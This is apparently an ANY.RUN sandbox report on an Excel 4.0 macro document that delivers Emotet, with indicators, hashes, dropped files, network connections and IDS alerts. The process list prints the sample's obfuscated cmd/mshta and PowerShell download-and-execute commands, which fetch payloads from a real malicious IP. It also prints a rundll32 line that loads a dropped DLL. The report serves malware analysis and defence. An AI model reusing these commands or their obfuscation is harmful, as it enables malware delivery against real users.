analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls

Full analysis: https://app.any.run/tasks/fa0ab44b-a0d2-4bf4-b5e5-01f8124cd501
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 24, 2022, 18:36:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros40
loader
trojan
emotet-doc
emotet
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 20 19:00:43 2022, Last Saved Time/Date: Thu Jan 20 19:07:37 2022, Security: 0
MD5:

3F7F1F6050609317474B8F48EFA00E88

SHA1:

C95BFBC3794A4371D3B5A6702052D662DEE19A15

SHA256:

ADE5C2C45C5BBAE939364326AE43A74C8B0C93307B7C653B12B80CBE8E891B70

SSDEEP:

1536:bpEk3hbdlylKsgqopeJBWhZFGkE+cL2NdA8eXZiozeOgXVZKyaZpvyR1kZkJvU+:bCk3hbdlylKsgqopeJBWhZFGkE+cL2Nr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
    • Executes PowerShell scripts

      • mshta.exe (PID: 3300)
      • mshta.exe (PID: 2504)
    • Loads dropped or rewritten executable

      • SearchProtocolHost.exe (PID: 3336)
      • rundll32.exe (PID: 2624)
      • rundll32.exe (PID: 1264)
      • rundll32.exe (PID: 1072)
      • rundll32.exe (PID: 3724)
    • Connects to CnC server

      • rundll32.exe (PID: 1264)
  • SUSPICIOUS

    • Reads default file associations for system extensions

      • SearchProtocolHost.exe (PID: 3336)
      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 3888)
      • cmd.exe (PID: 2532)
    • Checks supported languages

      • cmd.exe (PID: 3888)
      • powershell.exe (PID: 2868)
      • mshta.exe (PID: 3300)
      • cmd.exe (PID: 2532)
      • powershell.exe (PID: 3564)
      • mshta.exe (PID: 2504)
      • cmd.exe (PID: 2512)
      • cmd.exe (PID: 2504)
      • cmd.exe (PID: 1992)
    • Reads the computer name

      • powershell.exe (PID: 2868)
      • mshta.exe (PID: 3300)
      • powershell.exe (PID: 3564)
      • mshta.exe (PID: 2504)
    • Reads Microsoft Outlook installation path

      • mshta.exe (PID: 3300)
      • mshta.exe (PID: 2504)
    • Reads Environment values

      • powershell.exe (PID: 2868)
      • powershell.exe (PID: 3564)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2868)
      • rundll32.exe (PID: 3724)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 3564)
      • powershell.exe (PID: 2868)
    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 2512)
      • rundll32.exe (PID: 2624)
      • rundll32.exe (PID: 1072)
      • rundll32.exe (PID: 3724)
      • cmd.exe (PID: 2504)
    • Drops a file with a compile date too recent

      • powershell.exe (PID: 2868)
      • rundll32.exe (PID: 3724)
    • Starts itself from another location

      • rundll32.exe (PID: 2624)
    • Application launched itself

      • rundll32.exe (PID: 3724)
      • rundll32.exe (PID: 1072)
  • INFO

    • Reads the computer name

      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
      • rundll32.exe (PID: 3724)
      • rundll32.exe (PID: 1264)
    • Checks supported languages

      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
      • rundll32.exe (PID: 2624)
      • rundll32.exe (PID: 3724)
      • rundll32.exe (PID: 1264)
      • rundll32.exe (PID: 1072)
      • rundll32.exe (PID: 1832)
      • fc.exe (PID: 3468)
      • fc.exe (PID: 2396)
    • Reads internet explorer settings

      • mshta.exe (PID: 3300)
      • mshta.exe (PID: 2504)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2864)
      • EXCEL.EXE (PID: 592)
    • Manual execution by user

      • EXCEL.EXE (PID: 592)
      • fc.exe (PID: 3468)
      • cmd.exe (PID: 1992)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 2868)
      • powershell.exe (PID: 3564)
      • rundll32.exe (PID: 1264)
    • Reads settings of System Certificates

      • rundll32.exe (PID: 1264)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

HeadingPairs:
  • Worksheets
  • 2
  • Excel 4.0 Macros
  • 1
TitleOfParts:
  • Sheet2
  • Sheet1
  • BLC
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: -
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:01:20 19:07:37
CreateDate: 2022:01:20 19:00:43
Software: Microsoft Excel
LastModifiedBy: xXx
Author: xXx
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
64
Monitored processes
19
Malicious processes
10
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs mshta.exe powershell.exe excel.exe no specs cmd.exe no specs mshta.exe powershell.exe searchprotocolhost.exe no specs cmd.exe no specs rundll32.exe no specs rundll32.exe rundll32.exe no specs rundll32.exe cmd.exe no specs rundll32.exe no specs fc.exe no specs cmd.exe no specs fc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2864"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3888cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3300mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2868"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
592"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2532cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.htmlC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2504mshta http://0xb907d607/fer/fe2.htmlC:\Windows\system32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
3564"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
3336"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" C:\Windows\system32\SearchProtocolHost.exeSearchIndexer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft Windows Search Protocol Host
Exit code:
0
Version:
7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211)
2512"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyStringC:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
12 488
Read events
12 203
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
16
Text files
1
Unknown types
8

Dropped files

PID
Process
Filename
Type
2864EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR3435.tmp.cvr
MD5:
SHA256:
592EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR5C10.tmp.cvr
MD5:
SHA256:
2864EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xls.LNKlnk
MD5:7464406E83C45F0F70623CA831B9BD1F
SHA256:0BA02DB2AA7C58019DDB77133FDC841390D2605DB85E7422C268F6D86D4D690D
592EXCEL.EXEC:\Users\admin\Desktop\C9991000document
MD5:5DEF2339D666CE59F90BC5D140C8D932
SHA256:431B7E16DC3DBB787FC351C000C11F4679CF5B2D8B9A69E7BDB87BCFAADCFE2C
3300mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe2[1].htmbinary
MD5:9F303AED27F68A19797E11246A1EDE5B
SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B
2864EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.datini
MD5:105A209345F69A8DF243BCB9A739ABC2
SHA256:C114D70146ED4D9DA72D86BD4E967168433A825020139060BC3E630F58DE83C9
2868powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:D3C284009A5790C3AA90D7C5D620CA65
SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39
2864EXCEL.EXEC:\Users\admin\Desktop\ade5c2c45c5bbae939364326ae43a74c8b0c93307b7c653b12b80cbe8e891b70.xlsdocument
MD5:13707C4B8129D8E1FE6B1A1611E47339
SHA256:45AA2BE6FE26C047606F732E43B1500B490CA6CABFE82740C00B13C9AAD257FA
592EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFF9BB75E30745DBEE.TMPatn
MD5:CDFB84B601CD88D28A25B871ABD3BEC1
SHA256:DEA75B3664ECD4E1AA6329704610C7712C90633D8BF552F00724A2FF372C4C3E
2504mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\fe2[1].htmbinary
MD5:9F303AED27F68A19797E11246A1EDE5B
SHA256:6C10CCD246F588BE4BBBCF68605023CDFEAE0A210C0ED96836A2B2CE6340268B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
179
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2504
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
binary
10.8 Kb
malicious
2868
powershell.exe
GET
200
104.21.82.47:80
http://hindimedia.in/wp-content/uploads/iXntuGFqLE31oHsTk/
US
executable
612 Kb
suspicious
3300
mshta.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.html
FR
binary
10.8 Kb
malicious
3564
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.png
FR
text
1011 b
malicious
2868
powershell.exe
GET
200
185.7.214.7:80
http://185.7.214.7/fer/fe2.png
FR
text
1011 b
malicious
1264
rundll32.exe
GET
200
13.107.4.50:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5563e4366c123fe3
US
compressed
4.70 Kb
whitelisted
1264
rundll32.exe
GET
200
13.107.4.50:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1d81fbf8ae884c13
US
compressed
59.9 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1264
rundll32.exe
103.8.26.103:8080
SKSA TECHNOLOGY SDN BHD
MY
malicious
3300
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
2868
powershell.exe
104.21.82.47:80
hindimedia.in
Cloudflare Inc
US
suspicious
3564
powershell.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
1264
rundll32.exe
131.100.24.231:80
GOPLEX TELECOMUNICACOES E INTERNET LTDA - ME
BR
malicious
2868
powershell.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
2504
mshta.exe
185.7.214.7:80
Qual.it S.a.s.
FR
malicious
1264
rundll32.exe
209.59.138.75:7080
Liquid Web, L.L.C
US
malicious
1264
rundll32.exe
13.107.4.50:80
ctldl.windowsupdate.com
Microsoft Corporation
US
whitelisted
1264
rundll32.exe
51.38.71.0:443
GB
malicious

DNS requests

Domain
IP
Reputation
hindimedia.in
  • 104.21.82.47
  • 172.67.153.105
suspicious
ctldl.windowsupdate.com
  • 13.107.4.50
whitelisted

Threats

PID
Process
Class
Message
2868
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2868
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2868
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 5
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 14
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 3
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 19
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 9
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 18
1264
rundll32.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 17
34 ETPRO signatures available at the full report
No debug info